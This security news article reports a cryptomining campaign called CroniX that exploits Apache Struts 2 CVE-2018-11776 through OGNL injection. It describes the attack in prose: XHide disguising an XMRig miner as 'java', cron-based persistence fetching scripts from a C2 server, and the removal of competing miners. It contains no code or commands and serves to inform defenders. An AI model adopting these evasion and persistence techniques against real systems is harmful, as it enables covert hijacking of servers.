Active campaign exploiting Apache Struts 2 vulnerability

Share this…

A Monero mining script is spreading using remote command execution vulnerability

It seemed a matter of time before attacks like these happened in the wild, and they have already been seen. According to reports of ethical hacking specialists, a well-known malicious actor has deployed a great cryptocurrency mining campaign using the remote code execution vulnerability present in Apache Struts 2 recently disclosed. In this campaign, the attacker uses a persistent and stealthy malware called CroniX, the malware name comes from the fact that it uses the Cron tool for persistence and Xhide to launch executables with fake process names.

The vulnerability of Apache Struts 2 (CVE-2018-11776) was revealed a couple of weeks ago. Specialists in ethical hacking have warned that this has the potential to provoke even more havoc than last year’s Equifax data breach, also caused by Apache Struts 2 vulnerability (CVE-2017-5638).

The new campaign uses one of the proof-of-concept exploits that were published on GitHub2 and Twitter a few days after the vulnerability was publicly disclosed. Attackers use it to obtain remote code execution capabilities that are not authenticated on specific Linux machines in order to install a Monero mining script.

As with many other Apache struts 2 vulnerabilities, CVE-2018-11776 allows attackers to inject object graphic navigation language expressions (OGNL), which may contain malicious Java code. This time, the injection point is within the URL, the attacker sends a single HTTP request while injecting the OGNL expression that, once evaluated, executes shell commands to download and execute a malicious file.

Analyzing the malware in detail, experts in ethical hacking noticed that the malware downloads a file called “H”, which turns out to be an old XHide tool to launch executables with a fake process name. In this case, it launches a branch of the miner XMRig Monero, with an embedded configuration (group, user name and password), while the process name is changed to “java “, so as not to generate suspicion.

Experts also noticed that three Cron processes are used for persistence, and two of them refresh the backdoor every day with C2 server downloads. Another process downloads a daily file called “Anacrond “, which is saved in multiple Cron work files throughout the system. In all three cases, scripts are used to connect to the C2 server and download the implementation bash script to restart the mining process; earlier versions of scripts are removed from the system.

CroniX is also a competitive malware, as it locates and removes binaries from any previously installed cryptominer to reclaim all CPU resources.

While cryptomining may seem less damaging than other cyberattacks such as cleaner malware, ransomware or massive data theft (all of which can be carried out exploiting this vulnerability), specialists in ethical hacking from the International Institute of Cyber Security point out that the development of exploits tends to be faster for the more widely embedded vulnerabilities, highlighting the importance of solving this particular problem immediately.